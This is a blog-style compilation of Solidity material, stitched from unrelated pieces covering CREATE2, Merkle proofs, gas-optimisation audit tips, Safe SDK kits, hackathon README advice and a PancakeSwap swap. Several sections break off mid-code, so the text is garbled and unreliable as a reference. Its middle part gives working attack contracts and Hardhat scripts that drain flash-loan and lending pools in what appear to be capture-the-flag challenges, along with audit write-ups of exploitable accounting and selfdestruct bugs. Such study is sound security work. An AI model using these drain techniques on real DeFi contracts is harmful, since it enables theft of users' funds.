There are two major ways to deploy a smart contract: CREATE and CREATE2. They look quite similar, but there are some important differences. CREATE and CREATE2 are EVM opcodes that give us the ability to compute the address where a contract will be deployed before we actually deploy it.

You might be curious what an opcode is. Opcodes are the fundamental building blocks of EVM bytecode, and each opcode represents a specific operation that the EVM can perform. For example, there are opcodes for arithmetic operations, logical operations, storage access, memory manipulation, conditional branching, and more.
What is CREATE
Smart contracts can be created both by other contracts and by regular EOAs (externally owned accounts). Both compute the new address the same way:
new_address = last 20 bytes of keccak256(rlp_encode(sender, nonce))
So each created address is derived from the sender's nonce. The nonce increases on every transaction, so the resulting address depends on how many transactions the account has made and cannot be fixed in advance. That's why we need CREATE2.
What is CREATE2 ?
The whole idea behind this opcode is to make the resulting address independent of future events. Regardless of what may happen on the blockchain, it will always be possible to deploy the contract at the precomputed address.

Imagine a scenario where you need to deploy a contract to multiple networks, and you need to store the addresses of the yet-to-be-deployed contracts as storage parameters within the contract you are deploying right now. In such cases, you need to know the future addresses of those contracts in advance.

The CREATE2 opcode takes four parameters: the wei to send to the new contract, the memory offset of the creation code, the size of the creation code, and a salt:
function deploy(bytes memory bytecode, uint256 _salt) public payable returns (address) {
    address addr;
    assembly {
        addr := create2(
            callvalue(),         // wei sent with the current call
            add(bytecode, 0x20), // actual code starts after skipping the first 32 bytes (the length slot)
            mload(bytecode),     // size of the code, stored in the first 32 bytes
            _salt                // salt from the function arguments
        )
    }
    return addr;
}
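The address produced by CREATE2 can be precomputed from the deployer, the salt, and the hash of the creation bytecode. A minimal sketch of the computation (the function name is ours):

```solidity
// Sketch: precompute the CREATE2 address before deploying.
// deployer: the contract that will execute CREATE2
// salt:     the same salt passed to deploy()
// bytecode: the creation code of the contract to deploy
function computeAddress(
    address deployer,
    bytes32 salt,
    bytes memory bytecode
) public pure returns (address) {
    bytes32 hash = keccak256(
        abi.encodePacked(
            bytes1(0xff),       // constant prefix distinguishing CREATE2 from CREATE
            deployer,
            salt,
            keccak256(bytecode) // hash of the creation code
        )
    );
    // the address is the last 20 bytes of the hash
    return address(uint160(uint256(hash)));
}
```

As long as the deployer, salt, and bytecode stay the same, this address is fixed regardless of anything else that happens on chain.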
Merkle trees, named after Ralph Merkle, are a fundamental data structure used in cryptography and computer science. They are commonly employed in blockchain systems to ensure data integrity and enable efficient verification.
The principle behind Merkle trees is based on the concept of hash functions. A hash function is a mathematical algorithm that takes an input (data) and produces a fixed-size output, known as a hash value or digest. The key properties of a hash function are collision resistance and the avalanche effect.
How to generate Merkle tree data via Solidity
We can calculate a hash value through Solidity's keccak256 function:
keccak256(abi.encodePacked(toHashValue))
e.g. before hashing: 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2
after hashing: 0x999bf57501565dbd2fdcea36efa2b9aef8340a8901e3459f4a4c926275d36cdb
After performing the hash operation on the values of the leaf nodes, the adjacent nodes are then hashed together until only a single root node remains.
Suppose there are two adjacent nodes, A and B. The order of the hash operation, whether it is hash(A+B) or hash(B+A), is determined by comparing the values of A and B. In the corresponding Merkle code in OpenZeppelin, we can find the following snippet:
function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {
    return a < b ? _efficientHash(a, b) : _efficientHash(b, a);
}
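The _efficientHash helper referenced above hashes the two words directly in scratch memory, avoiding the allocation that abi.encodePacked would perform. OpenZeppelin's MerkleProof implements it roughly like this:

```solidity
// Hash two 32-byte values without allocating new memory:
// write both words into the scratch space (0x00-0x3f) and hash 64 bytes.
function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
    assembly {
        mstore(0x00, a)
        mstore(0x20, b)
        value := keccak256(0x00, 0x40)
    }
}
```

The result is identical to keccak256(abi.encodePacked(a, b)), just cheaper in gas.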
In summary, the smaller value is placed first to determine the order for computing the hash. This can cause some confusion when performing the calculations manually.
In practical projects, it is common to store only the final result, the root hash value, in the contract. Storing a large number of addresses in the contract would consume a significant amount of gas fees. By using a Merkle tree calculation, the amount of data that needs to be stored is greatly reduced.
Let’s demonstrate how to calculate and store the root hash value using a setup example from Foundry:
bytes32 public root;
bytes32[] public leafs;
bytes32[] public l2;

function setUp() public {
    address[] memory addrss = new address[](4);
    addrss[0] = 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2;
    addrss[1] = 0x2d886570A0dA04885bfD6eb48eD8b8ff01A0eb7e;
    addrss[2] = 0xed857ac80A9cc7ca07a1C213e79683A1883df07B;
    addrss[3] = 0x690B9A9E9aa1C9dB991C7721a92d351Db4FaC990;

    // Calculate the hash values of the leaf nodes from the list of addresses.
    leafs.push(keccak256(abi.encodePacked(addrss[0])));
    leafs.push(keccak256(abi.encodePacked(addrss[1])));
    leafs.push(keccak256(abi.encodePacked(addrss[2])));
    leafs.push(keccak256(abi.encodePacked(addrss[3])));

    // Calculate the hash values of the second level.
    l2.push(keccak256(abi.encodePacked(leafs[0], leafs[1])));
    l2.push(keccak256(abi.encodePacked(leafs[2], leafs[3])));

    // Hash the two second-level nodes together to obtain the root.
    root = keccak256(abi.encodePacked(l2[0], l2[1]));
}
For demonstration purposes, we have provided only four addresses. In actual projects, the number of addresses can be significantly larger.
How to verify Merkle proof data
Once we have stored the root hash value in the contract, how do we verify if a client-provided address is a valid address or belongs to a whitelist?
Firstly, we hash the address and pass that hash as the leaf parameter. Then we pass the adjacent hash values along the path to the root as the proof to the verification function.
The proof list corresponds to the red-marked area in the image below.
test proof function:
function testVerify() public {
    address proofAddress = 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2;

    // The proof consists of the sibling hashes along the path to the root:
    // the neighbouring leaf and the neighbouring second-level node.
    bytes32[] memory proof = new bytes32[](2);
    proof[0] = leafs[1];
    proof[1] = l2[1];

    assertTrue(verify(proof, root, keccak256(abi.encodePacked(proofAddress))));
}
function parentHash(bytes32 a, bytes32 b) public pure returns (bytes32) {
    if (a < b) {
        return keccak256(abi.encode(a, b));
    } else {
        return keccak256(abi.encode(b, a));
    }
}
The statement abi.encode(address, uint) produces 64 bytes. Since abi.encode(bytes32, bytes32) also yields 64 bytes, hash collisions may occur between leaf nodes and parent nodes (a second-preimage attack on the tree).
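A common mitigation, used in OpenZeppelin's examples, is to hash leaves twice, so a 64-byte leaf encoding can never produce the same input as a 64-byte inner-node pair. A minimal sketch (the helper name is ours):

```solidity
// Sketch: double-hash the leaf so the final keccak256 input is 32 bytes,
// while inner nodes are always hashed from 64 bytes - the two can never collide.
function leafHash(address account, uint256 amount) internal pure returns (bytes32) {
    return keccak256(bytes.concat(keccak256(abi.encode(account, amount))));
}
```

With this scheme an attacker cannot present an inner node's 64-byte preimage as a fake leaf.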
function testLowLevelCallRevert() public {
    vm.expectRevert(bytes("error message"));
    (bool revertsAsExpected, ) = address(myContract).call(myCalldata);
    assertTrue(revertsAsExpected, "expectRevert: call did not revert");
}
Use our deployed contract to send the funds back using the deposit function. After the flash loan, call the withdraw function to take our funds back. Do not forget to add a receive function for receiving ether. Use the _to.call function to send ether; it is the currently recommended method.
function attack(SideEntranceLenderPool pool, address payable player) external {
    // make a flash loan
    pool.flashLoan(1000 ether);
    // get the money
    pool.withdraw();
    // send to player
    (bool sent, ) = player.call{value: 1000 ether}("");
    require(sent, "Failed to send Ether");
}
    receive() external payable {}
}
Challenge 5
The reward pool only counts the amount deposited. We can use a flash loan to borrow some DVT tokens and claim the reward tokens at the same time. Here goes the code:
function receiveFlashLoan(uint256 amount) external {
    // approve the amount to the reward pool
    DVTtoken.approve(address(RewardPool), amount);

    // deposit into the reward pool
    RewardPool.deposit(amount);

    // claim the rewards
    RewardPool.distributeRewards();

    // withdraw the DVT tokens
    RewardPool.withdraw(amount);

    // return the DVT tokens to the pool
    DVTtoken.transfer(address(pool), amount);

    // send the reward tokens to our player
    RdToken.transfer(owner, RdToken.balanceOf(address(this)));
}
This challenge is similar to the previous one. Firstly, we use a flash loan to borrow some DVT tokens. Secondly, we use the DVT tokens to queue a governance action. Finally, two days later, we call executeAction to claim the DVT tokens to our attack contract and send them to our player. Here goes the entire code:
Therefore, we swap all our DVT tokens to ETH, and the ratio uniswapPair.balance / token.balanceOf(uniswapPair) goes down. After that happens, we can deposit our ETH to borrow all the DVT tokens in the lending pool.
// approve DVT tokens to the Uniswap pool
token.approve(uniswapExchange, token.balanceOf(address(this)));

// swap all DVT tokens to ETH in the Uniswap pool
UniswapExchangeInterface(uniswapExchange).tokenToEthSwapInput(
    token.balanceOf(address(this)),
    1,
    block.timestamp + 5
);

// borrow DVT tokens by depositing ETH
pool.borrow{value: address(this).balance}(token.balanceOf(address(pool)), msg.sender);
}
There’s a pool with 1000 ETH in balance, offering flash loans. It has a fixed fee of 1 ETH. A user has deployed a contract with 10 ETH in balance. It’s capable of interacting with the pool and receiving flash loans of ETH. Take all ETH out of the user’s contract. If possible, in a single transaction.
The issue here is that the user contract does not check that the caller is the owner, so anyone can take a flash loan on behalf of that contract. We can interact with the pool contract directly to drain the user's contract like this:
const ETH = await pool.ETH();
for (let i = 0; i < 10; i++) {
  await pool.connect(player).flashLoan(receiver.address, ETH, 0, "0x");
}
Or we can deploy an attack contract to invoke the pool contract:
Use .call instead of .transfer to send ether
.transfer forwards only 2300 gas, while .call forwards all available gas. If the receive/fallback function of the recipient (e.g. a proxy contract) has complex logic, using .transfer will fail, causing integration issues.
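A minimal sketch of the recommended pattern (the helper name is ours):

```solidity
// Sketch: forward all gas with .call and check the success flag,
// instead of relying on .transfer's fixed 2300 gas stipend.
function sendEther(address payable to, uint256 amount) internal {
    (bool success, ) = to.call{value: amount}("");
    require(success, "ETH transfer failed");
}
```

Because .call forwards all gas, combine this with a reentrancy guard or the checks-effects-interactions pattern.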
Unbounded loop
function claimGovFees() public {
    address[] memory assets = bondNFT.getAssets();
Use immutable for state variables that are only set in the constructor

- address public owner;
+ address public immutable owner;
mapping(address => bool): using bool for storage incurs overhead
- mapping(address => bool) public allowedAsset;
+ mapping(address => uint256) public allowedAsset;
Save gas with the use of the import statement
The Solidity code is also cleaner in another way that might not be noticeable: the struct Point. We were previously importing it with a global import but not using it; the Point struct polluted the source code with an unnecessary object we did not need. This breaks the rule of modularity and modular programming: only import what you need. Specific imports with curly braces allow us to apply this rule better.
Recommendation:
import {contract1, contract2} from "filename.sol";
Sort Solidity operations using short-circuit mode
//f(x) is a low gas cost operation
//g(y) is a high gas cost operation
//Sort operations with different gas costs as follows
f(x) || g(y)
f(x) && g(y)
Change the for-loop bounds to avoid the +1, and use ++x, which is more gas efficient
function buy(uint256 _amount) external payable {
    ...
-   for (uint48 x = sale_.currentId + 1; x <= newId; x++) {
+   for (uint48 x = sale_.currentId; x < newId; ++x) {
        nft.mint(msg.sender, x);
    }
    ...
}
Multiple access to mapping/array should use local variable cache
Duplicated require should be modifier or function
Use custom error rather than revert()/require()
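For example, a custom error replaces the revert-string bytes with a 4-byte selector, which is cheaper both to deploy and to revert with (the names below are illustrative):

```solidity
// Custom error: encoded as a 4-byte selector plus arguments,
// instead of storing and returning a full revert string.
error Unauthorized(address caller);

contract Vault {
    address public owner;

    function restricted() external view {
        // cheaper than: require(msg.sender == owner, "caller is not the owner");
        if (msg.sender != owner) revert Unauthorized(msg.sender);
    }
}
```

Custom errors are available from Solidity 0.8.4 onward.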
Use calldata instead of memory for read-only variable
require()/revert() string longer than 32 bytes cost extra gas
Using Openzeppelin Ownable2Step.sol is gas efficient
Using UniswapV3 mulDiv function is gas-optimized
Use nested if statements and avoid combining multiple checks with &&
Avoid using state variable in emit (130 gas)
Instead of caching a whole object, try caching single attributes
Using int32 for time
Don’t use _msgSender() if not supporting EIP-2771
Using > 0 costs more gas than != 0 when used on a uint in a require() statement(version>0.8.13)
Using bools for storage incurs overhead
.length should not be looked up in every loop of a for-loop
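A sketch of the cached-length pattern (the saving is largest for storage arrays, where each .length read is an SLOAD):

```solidity
// Sketch: read arr.length once instead of on every loop iteration.
function sum(uint256[] memory arr) internal pure returns (uint256 total) {
    uint256 length = arr.length; // cache the length outside the loop
    for (uint256 i = 0; i < length; ++i) {
        total += arr[i];
    }
}
```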
Using calldata instead of memory for read-only arguments in external functions saves gas
Splitting require() statements that use && saves gas
Use a more recent version of solidity
+= costs more gas than = + for state variables
Using storage instead of memory for structs/arrays saves gas
After the contract is destroyed, subsequent calls to the contract's buy() function still succeed. That causes the caller's msg.value to be locked in the contract forever.
Proof of concept
Note: when there is no code at the address, the transaction will still succeed, and the msg.value will be held at the (now empty) contract address.
Let's say Alice and Bob are invoking the contract simultaneously, and both transactions are sent to the mempool. Alice's transaction executes first, and the contract is destroyed while Bob is still waiting for his result. Finally, Bob's transaction executes and sends his funds to this contract. This way Bob's funds are lost, locked forever in this empty contract.
Recommended mitigation steps
Instead of using selfdestruct, we could modify state to represent that the contract has completed its process. We could modify the code like this:
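A minimal sketch of this mitigation, assuming a simple sale contract (contract and function names are ours):

```solidity
// Sketch: keep the contract deployed and gate buy() on a flag,
// instead of calling selfdestruct.
contract Sale {
    bool public closed; // replaces selfdestruct: the contract stays on chain

    function buy() external payable {
        require(!closed, "sale is closed"); // reject payments after closing
        // ... sale logic ...
    }

    function close() external {
        // instead of selfdestruct(payable(owner)), just flip the flag
        // (access control omitted for brevity)
        closed = true;
    }
}
```

With the flag in place, a late transaction like Bob's reverts and his funds are returned rather than trapped.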
Safe provides an SDK to create a smart contract account, which is a fully customizable account. In crypto, if you give away your private key, your money is gone; you can't take it back. Smart accounts are built to prevent that. Common use cases:
multiple signers (2 or more)
set a spending limit (e.g. $100 per day)
Smart Account vs Signing Account (EOA): the difference between the two types of accounts
/* This Safe is tied to owner 1 because the factory was
   initialized with an adapter that had owner 1 as the signer. */
const safeSdkOwner1 = await safeFactory.deploySafe({ safeAccountConfig });
const safeAddress = safeSdkOwner1.getAddress();
console.log("Your Safe has been deployed:");
console.log(`https://goerli.etherscan.io/address/${safeAddress}`);
console.log(`https://app.safe.global/gor:${safeAddress}`);
Auth Kit
The Auth kit creates an Ethereum address and authenticates a blockchain account using an email address, social media account, or traditional crypto wallets like Metamask.
safeAuthKit.subscribe(SafeAuthEvents.SIGN_OUT, () => {
  console.log("User is not authenticated");
});
const safeAuthKit = await SafeAuthKit.init(SafeAuthProviderType.Web3Auth, {
  ...
  // Add the corresponding transaction service url depending on the network.
  // Other networks: https://docs.gnosis-safe.io/learn/infrastructure/available-services#safe-transaction-service
  txServiceUrl: 'https://safe-transaction-goerli.safe.global',
  authProviderConfig: { ... }
})
Relay Kit
The Relay Kit allows users to pay transaction fees (gas fees) using the native blockchain token or ERC-20 tokens. This allows you to pay gas fees using any ERC-20 token in your Safe, even if you don’t have ETH.
const options: MetaTransactionOptions = {
  isSponsored: true, // This parameter is mandatory to use the 1Balance method
};

relayAdapter.relayTransaction({
  target: "0x...", // the Safe address
  encodedTransaction: "0x...", // encoded Safe transaction data
  chainId: 5,
  options,
});
Onramp Kit
This package is provided for testing purposes only
Modules are smart contracts that add custom features to Safe contracts. They separate module logic from the Safe’s core contract, and are added or removed with confirmation from all owners. Modules are critical for security and emit events when added, removed, or when module transactions succeed or fail. There are many types of modules, including daily spending allowances, recurring transactions, standing orders, and social recovery modules, which can help you recover a Safe if you lose access to owner accounts. Modules can be used in various ways to enhance your Safe’s functionality.
Guards
Transaction guards can make checks before and after a Safe transaction.
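A guard implements two hooks that the Safe calls around every transaction. A rough sketch of the shape, based on the Guard interface in Safe's GuardManager (verify the exact signatures against the contract version you deploy; the contract name and policy are ours):

```solidity
// Sketch of a transaction guard that forbids delegatecalls.
// checkTransaction runs before execution; checkAfterExecution runs after.
contract DenyDelegateCallGuard {
    function checkTransaction(
        address to,
        uint256 value,
        bytes calldata data,
        uint8 operation, // in the real interface this is an Enum.Operation: 0 = CALL, 1 = DELEGATECALL
        uint256 safeTxGas,
        uint256 baseGas,
        uint256 gasPrice,
        address gasToken,
        address payable refundReceiver,
        bytes calldata signatures,
        address msgSender
    ) external {
        // pre-execution check: reject any delegatecall from the Safe
        require(operation == 0, "delegatecall not allowed");
    }

    function checkAfterExecution(bytes32 txHash, bool success) external {
        // post-execution check: could verify invariants, e.g. owner set unchanged
    }
}
```

Because a misbehaving guard can brick a Safe (every transaction passes through it), guards should be audited as carefully as the Safe itself.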
A voucher can be counted arbitrarily many times in a staker's lockedCoinAge. If a voucher has maximized its trust, its vouch.locked is added to lockedCoinAge in full each time, because its lastUpdated is kept intact. This provides a surface to grow lockedCoinAge as large as an attacker wants, increasing it by current_block_difference * vouch.locked on each transaction.
uint256 lastWithdrawRewards = getLastWithdrawRewards[vouch.staker];
stakers[vouch.staker].lockedCoinAge +=
    (block.number - _max(lastWithdrawRewards, uint256(vouch.lastUpdated))) *
    uint256(vouch.locked);
if (lock) {
    // Look up the staker and determine how much unlocked stake they
    // have available for the borrower to borrow. If there is 0
    // then continue to the next voucher in the array
    uint96 stakerLocked = stakers[vouch.staker].locked;
    uint96 stakerStakedAmount = stakers[vouch.staker].stakedAmount;
    uint96 availableStake = stakerStakedAmount - stakerLocked;
    uint96 lockAmount = _min(availableStake, vouch.trust - vouch.locked);
    if (lockAmount == 0) continue;
    // Calculate the amount to add to the lock then
    // add the extra amount to lock to the stakers locked amount
    // and also update the vouches locked amount and lastUpdated block
    innerAmount = _min(remaining, lockAmount);
    stakers[vouch.staker].locked = stakerLocked + innerAmount;
    vouch.locked += innerAmount;
    vouch.lastUpdated = uint64(block.number);
} else {
    // Look up how much this vouch has locked. If it is 0 then
    // continue to the next voucher. Then calculate the amount to
    // unlock which is the min of the vouches lock and what is
    // remaining to unlock
    uint96 locked = vouch.locked;
    if (locked == 0) continue;
    innerAmount = _min(locked, remaining);
    // Update the stored locked values and last updated block
    stakers[vouch.staker].locked -= innerAmount;
    vouch.locked -= innerAmount;
    vouch.lastUpdated = uint64(block.number);
}
The code above is invoked when a user calls the borrow() function with amount > minBorrow:
function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant {
    IAssetManager assetManagerContract = IAssetManager(assetManager);
    if (amount < minBorrow) revert AmountLessMinBorrow();
    if (amount > getRemainingDebtCeiling()) revert AmountExceedGlobalMax();
...
    // Call update locked on the userManager to lock this borrowers stakers. This function
    // will revert if the account does not have enough vouchers to cover the borrow amount. ie
    // the borrower is trying to borrow more than is able to be underwritten
    IUserManager(userManager).updateLocked(msg.sender, (actualAmount + fee).toUint96(), true);
When vouch.trust == vouch.locked, the value of lockAmount is zero and the loop continues to the next voucher. Thus the value of lastUpdated is never updated.
Suppose Bob the staker has a vouch with trust maxed out, i.e. vouch.trust = vouch.locked = 10k DAI. He can set up a second borrower from his own account with some minimal trust, then run minimum-size borrows many, many times, gaining a huge stakers[vouch.staker].lockedCoinAge: since vouch.lastUpdated is never updated, lockedCoinAge grows by a positive some_number_of_blocks * 10k DAI each time Bob borrows 1 DAI via his second borrower.
    if (token.balanceOf(address(this)) < balanceBefore) revert RepayFailed();
    return true;
}
Target here means the address of the DVT token we deployed before. Thus we can use this call to approve an amount to the attacker's address. Let's jump into the code:
Firstly, we need an ABI string for the approve function. Secondly, we make a flash loan via the pool address. Finally, we transfer the pool's entire DVT balance to msg.sender (the player).
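A sketch of an attack contract following those steps (the contract name and simplified interfaces are ours):

```solidity
// Minimal interfaces assumed for this sketch.
interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transferFrom(address, address, uint256) external returns (bool);
}

interface ITrusterLenderPool {
    function flashLoan(uint256 amount, address borrower, address target, bytes calldata data) external returns (bool);
}

// Sketch: abuse the pool's arbitrary target.functionCall(data) to make
// the pool approve this contract, then sweep its balance to the caller.
contract TrusterAttack {
    function attack(ITrusterLenderPool pool, IERC20 token) external {
        uint256 poolBalance = token.balanceOf(address(pool));

        // ABI-encode token.approve(address(this), poolBalance)
        bytes memory data = abi.encodeWithSignature(
            "approve(address,uint256)",
            address(this),
            poolBalance
        );

        // zero-amount flash loan whose "target" is the token itself,
        // so the pool executes the approve on our behalf
        pool.flashLoan(0, msg.sender, address(token), data);

        // the pool has now approved us; pull everything to the player
        token.transferFrom(address(pool), msg.sender, poolBalance);
    }
}
```

Because the loan amount is zero, nothing needs to be repaid, and the whole drain fits in one transaction.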
Hardhat test script
// deploy the attack contract
attack = await (
  await ethers.getContractFactory("TrusterAttack", player)
).deploy();
// invoke the attack contract via the player address
await attack.connect(player).attack(pool.address, token.address);
A hackathon is an event where developers, designers, and other tech enthusiasts come together to collaborate on a project. At the end of the event, all teams present their projects to a panel of judges. A hackathon readme document is a crucial part of presenting your project. It provides details about your project, how to use it, and how to contribute to it. In this blog post, we will discuss how to write a hackathon readme document that will help you present your project effectively.
why we need a readme document
The purpose of writing a README document is to provide information about a project or software. It should include instructions on how to install and use the software, as well as any dependencies or requirements. The document should also provide an overview of the project and its goals, as well as any relevant background information. Additionally, it should cover any edge cases or potential issues that users might encounter, and provide instructions on how to address them. Finally, it should include information on how to contribute to the project, as well as any testing or quality assurance protocols that are in place.
what should be included in readme document
live links
After the entire project is finished, we should deploy it on a server so that hackathon judges can review the project by clicking the link. Additionally, we should upload a video about how to use it to YouTube. Here is an example:
A directory tree gives a quick view of the whole project, so hackathon judges can quickly find what they want. It is quite easy to generate with the Linux tree command:
tree -L {max-depth}
Here goes the output of this command
flowchart
A project flowchart is a visual representation of the sequence of steps in a project. It helps in identifying process inefficiencies, improving communication, and ensuring everyone involved in the project is on the same page. I recommend using Miro to draw a flowchart. Miro is an online collaborative whiteboard platform that enables distributed teams to work effectively together, from brainstorming with digital sticky notes to planning and managing agile workflows. Here is an example created with Miro:
install
The install commands depend on the tech stack you use. Let's say you are building with React and Node: we have to install all dependencies before we run the server.
npm install
npm run dev
api document
API stands for Application Programming Interface. It is a set of protocols, routines, and tools for building software and applications. Documentation is an essential part of the development process because it enables developers to understand the functionality of the API.
tech stack
When it comes to building a software project, one of the most important decisions you'll make is choosing the right tech stack. A tech stack is the combination of technologies and programming languages used to build a software application. It's important to choose the right tech stack because it can affect the performance, scalability, and maintainability of your project. We can list the tech stack in our readme document like this:
next.js
tailwindcss
solidity
uniswap v3 protocol
reference
References are important for several reasons. First, they provide evidence to support your arguments, which adds credibility to your work. Second, references allow readers to verify the information you have presented. Third, references demonstrate that you have done your research and are knowledgeable about your topic. Finally, they show that you are giving credit to the original authors for their ideas and work.
A code license is a legal agreement that outlines the terms and conditions for the use, distribution, and modification of a piece of code. SPDX short identifier: MIT
In this article I am going to show you how to make a swap using the PancakeSwap smart router in a Solidity contract. Here we go. In this example I swap BUSD tokens to CAKE. Here are the addresses of each token:
Let's dive in. Firstly, we need to set a swap amount, e.g. 0.01 BUSD, and we need a minimum output amount as well. The last parameter is the path, which is the route of tokens to swap through. When we swap BUSD to CAKE, we can find a pool consisting of BUSD and CAKE, so the path is simple. For some other tokens the path may be a little longer: we may have to route through two, three, or more pools to get the token we want. The PancakeSwap front-end returns a path before we make the swap; in Solidity code we have to compute the optimal path ourselves. Let's dive into the PancakeSwap smart router code.
There are many swap functions we can use to help us swap tokens. In this demo we use swapExactTokensForTokens. As you can see, there is also a function named swapExactTokensForTokensSupportingFeeOnTransferTokens. We need to know the difference between these two functions.
function swapExactTokensForTokensSupportingFeeOnTransferTokens(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint deadline
) external virtual override ensure(deadline) {
    // transfer tokens from the sender address to the first pair
    TransferHelper.safeTransferFrom(
        path[0],
        msg.sender,
        PancakeLibrary.pairFor(factory, path[0], path[1]),
        amountIn
    );
    // the balance of the destination token that the receiver holds
    uint balanceBefore = IERC20(path[path.length - 1]).balanceOf(to);

    // make the swap
    _swapSupportingFeeOnTransferTokens(path, to);

    // make sure the amount out is at least the set amountOutMin value
    require(
        IERC20(path[path.length - 1]).balanceOf(to).sub(balanceBefore) >= amountOutMin,
        'PancakeRouter: INSUFFICIENT_OUTPUT_AMOUNT'
    );
}
function swapExactTokensForTokens(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint deadline
) external virtual override ensure(deadline) returns (uint[] memory amounts) {
    // get the output amounts from PancakeLibrary via amountIn
    amounts = PancakeLibrary.getAmountsOut(factory, amountIn, path);

    // after calculating the amounts, make sure the final amount out is at least amountOutMin
    require(amounts[amounts.length - 1] >= amountOutMin, 'PancakeRouter: INSUFFICIENT_OUTPUT_AMOUNT');
After comparing the two functions above, we know the difference: in swapExactTokensForTokens the exact output amounts are computed up front by PancakeLibrary.getAmountsOut, while the fee-on-transfer variant checks the receiver's balance before and after instead. In this article we use swapExactTokensForTokensSupportingFeeOnTransferTokens. Here is the entire code from the GitHub gist: code
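Putting it together, a call from a contract might look like the following sketch (the contract name, function name, and simplified interfaces are ours; addresses and amounts are passed in as parameters for illustration):

```solidity
// Minimal interfaces assumed for this sketch.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
}

interface IPancakeRouter {
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

// Sketch: swap BUSD for CAKE through the PancakeSwap router.
contract SwapDemo {
    function swapBusdToCake(
        address router,
        address busd,
        address cake,
        uint256 amountIn,     // e.g. 0.01 BUSD (in wei units of BUSD)
        uint256 amountOutMin  // slippage protection: minimum CAKE to accept
    ) external {
        // the router pulls tokens from this contract, so approve it first
        IERC20(busd).approve(router, amountIn);

        // direct path: a BUSD/CAKE pool exists, so no intermediate hops
        address[] memory path = new address[](2);
        path[0] = busd;
        path[1] = cake;

        // send the output to the caller; allow 5 minutes for inclusion
        IPancakeRouter(router).swapExactTokensForTokensSupportingFeeOnTransferTokens(
            amountIn,
            amountOutMin,
            path,
            msg.sender,
            block.timestamp + 300
        );
    }
}
```

The caller must have transferred the BUSD to this contract beforehand; for longer routes, simply extend the path array with the intermediate token addresses.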